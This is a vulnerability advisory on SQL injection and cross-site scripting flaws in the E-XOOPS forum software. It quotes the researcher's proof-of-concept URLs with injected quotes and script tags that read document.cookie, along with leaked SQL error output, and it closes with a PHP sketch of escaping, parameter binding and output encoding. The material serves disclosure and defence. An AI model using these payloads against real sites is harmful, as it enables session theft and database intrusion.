exoops Input Validation Flaws Permit SQL Injection and Cross-Site Scripting Attacks
SecurityTracker Alert ID: 1013566
SecurityTracker URL: http://securitytracker.com/id?1013566
CVE Reference: CVE-2005-0910, CVE-2005-0911
Updated: Jul 7 2008
Original Entry Date: Mar 27 2005
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of authentication information, Modification of user information
Exploit Included: Yes

Description: Diabolic Crab reported some input validation vulnerabilities in exoops. A remote user can inject SQL commands. A remote user can also conduct cross-site scripting attacks.

Several scripts do not properly validate user-supplied input in certain parameters. A remote user can supply a specially crafted URL to execute SQL commands on the underlying database. Some demonstration exploit URLs are provided:

http://[target]/modules/newbb/index.php?viewcat='SQL_INJECTION
http://[target]/modules/sections/index.php?op=viewarticle&artid=9%2c+9%2c+9

A remote user can also create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the exoops software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user. Some demonstration exploit URLs are provided:

http://[target]/modules/newbb/viewforum.php?sortname=p.post_time&sortorder=ASC&sortdays=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&forum=25&refresh=Vai
http://[target]/modules/newbb/index.php?viewcat=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Impact: A remote user can execute SQL commands on the underlying database. A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the exoops software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution: No solution was available at the time of this entry.
Vendor URL: www.exoops.info/
Cause: Input validation error
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
Reported By: "Dcrab" <dcrab@hackerscenter.com>
Message History: None.

Source Message Contents

Date: Sun, 27 Mar 2005 20:33:06 +0530
From: "Dcrab" <dcrab@hackerscenter.com>
Subject: Multiple Sql injection, and multiple XSS vulnerabilities in Easy Community Management System Forum (E-XOOPS)
Dcrab's Security Advisory
http://icis.digitalparadox.org/~dcrab
http://www.hackerscenter.com/
Severity: High
Title: Multiple Sql injection, and multiple XSS vulnerabilities in
Easy Community Management System Forum (E-XOOPS)
Date: March 28, 2005
Summary:
There are multiple sql injection, xss vulnerabilities in the Easy
Community Management System Forum (E-XOOPS)
Vendor: E-Xoops
Vendor website: www.exoops.info
Proof of Concept Exploits:
http://localhost/modules/newbb/viewforum.php?sortname=p.post_time&sortorder=ASC&sortdays=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&forum=25&refresh=Vai
Pops cookie
http://localhost/modules/newbb/index.php?viewcat=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Pops cookie
http://localhost/modules/newbb/index.php?viewcat='SQL_INJECTION
SQL ERROR AND POSSIBLE INJECTION
Error
SELECT f.*, u.uname, u.uid, p.topic_id, p.post_time, p.subject,
p.icon FROM e_xoops_bb_forums f LEFT JOIN e_xoops_bb_posts p ON
p.post_id = f.forum_last_post_id LEFT JOIN e_xoops_users u ON u.uid =
p.uid WHERE f.cat_id = \'SQL_INJECTION ORDER BY f.cat_id,
f.forum_name
http://localhost/modules/sections/index.php?op=viewarticle&artid=9%2c+9%2c+9
SQL ERROR AND POSSIBLE INJECTION
Errore Numero: 2 [Attenzione]
Message errore: mysql_fetch_row(): supplied argument is not a valid
MySQL result resource
In File: /var/www/*************/09/class/database/mysql.php
On Line: 151
Errore Numero: 2 [Attenzione]
Message errore: mysql_fetch_row(): supplied argument is not a valid
MySQL result resource
In File: /var/www/*************/09/class/database/mysql.php
On Line: 151
Possible fix: The usage of htmlspecialchars(),
mysql_escape_string(), mysql_real_escape_string() and other functions
for input validation before passing user input to the mysql database,
or before echoing data on the screen, would solve these problems.
Author:
These vulnerabilities have been found and released by Diabolic Crab,
Email: dcrab[AT|NOSPAM]hackersenter[DOT|NOSPAM]com, please feel free
to contact me regarding these vulnerabilities. You can find me at
http://www.hackerscenter.com or
http://icis.digitalparadox.org/~dcrab. Look out for my soon to come
out book on Secure coding with php.
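
The following PHP sketch is an added example, not part of Dcrab's advisory or the E-XOOPS code base. It models the viewcat query from the error output above to show why quote-escaping alone does not protect a value used in an unquoted numeric context, next to integer validation, a bound parameter and htmlspecialchars() for output. SQLite via PDO stands in for MySQL, and the sample rows and function names are constructed.

```php
<?php
// Added example, not E-XOOPS code. Table and column names follow the query in
// the advisory's error output; rows and function names are constructed.
$db = new PDO('sqlite::memory:'); // assumption: SQLite stands in for MySQL
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE e_xoops_bb_forums (forum_name TEXT, cat_id INTEGER)');
$db->exec("INSERT INTO e_xoops_bb_forums VALUES ('General', 1), ('Support', 2)");

// Escaping only: the value lands in a numeric context with no surrounding
// quotes, so quote-escaping still lets it be parsed as SQL syntax.
function forums_escaped(PDO $db, string $viewcat): string {
    $escaped = str_replace("'", "''", $viewcat); // stand-in for mysql_real_escape_string()
    $sql = "SELECT forum_name FROM e_xoops_bb_forums"
         . " WHERE cat_id = $escaped ORDER BY forum_name";
    try {
        return implode(',', $db->query($sql)->fetchAll(PDO::FETCH_COLUMN));
    } catch (PDOException $e) {
        return 'SQL error'; // the input reached the SQL parser
    }
}

// Hardened: check the type first, then bind the value as a parameter.
function forums_hardened(PDO $db, string $viewcat): string {
    $id = filter_var($viewcat, FILTER_VALIDATE_INT, ['options' => ['min_range' => 0]]);
    if ($id === false) {
        return 'rejected';
    }
    $stmt = $db->prepare(
        'SELECT forum_name FROM e_xoops_bb_forums WHERE cat_id = ? ORDER BY forum_name'
    );
    $stmt->execute([$id]);
    return implode(',', $stmt->fetchAll(PDO::FETCH_COLUMN));
}

// Output encoding for values echoed back into HTML text or attributes.
function html_out(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Inputs: one valid id plus the two decoded values from the advisory's URLs.
foreach (['2', "'SQL_INJECTION", '9, 9, 9'] as $input) {
    printf("%-16s escaped: %-10s hardened: %s\n",
        $input, forums_escaped($db, $input), forums_hardened($db, $input));
}
// The decoded sortdays/viewcat value from the advisory, encoded for output.
echo html_out('"><script>alert(document.cookie)</script>'), "\n";
```

The escaped variant still hands both advisory inputs to the SQL parser, while the hardened variant rejects them before any query is built.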